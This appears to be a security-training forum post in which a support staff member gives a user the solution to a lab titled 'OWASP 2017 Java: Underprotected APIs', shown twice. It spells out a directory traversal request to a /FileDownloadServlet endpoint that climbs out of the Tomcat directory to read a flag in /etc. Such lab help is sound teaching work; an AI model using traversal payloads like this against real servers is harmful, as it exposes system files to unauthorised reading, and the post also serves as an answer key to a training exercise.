Forum Discussion
Bronze IIOWASP 2017 Java: Underprotected APIs
Hey Akshay 👋🏻,
Welcome to the Human Connection 😊
I've just had a look at the information on our internal lab page, and it does look like you are searching for the right endpoint here (/FileDownloadServlet).
You will need to use the directory traversal to include the flag from /etc/flag.txt /FileDownloadServlet?file=flag.txt&path=/var/lib/tomcat9/../../../../etc
I'm hoping that this will help, but just in case you have any further problems solving this, I'll tag in my colleague NyePrior to see if they have any other guidance to help 👍🏻
Let us know how you get on with your attempt!
Kindest regards,
Chris
Community SupportHey Akshay 👋🏻,
Welcome to the Human Connection 😊
I've just had a look at the information on our internal lab page, and it does look like you are searching for the right endpoint here (/FileDownloadServlet).
You will need to use the directory traversal to include the flag from /etc/flag.txt /FileDownloadServlet?file=flag.txt&path=/var/lib/tomcat9/../../../../etc
I'm hoping that this will help, but just in case you have any further problems solving this, I'll tag in my colleague NyePrior to see if they have any other guidance to help 👍🏻
Let us know how you get on with your attempt!
Kindest regards,
Chris
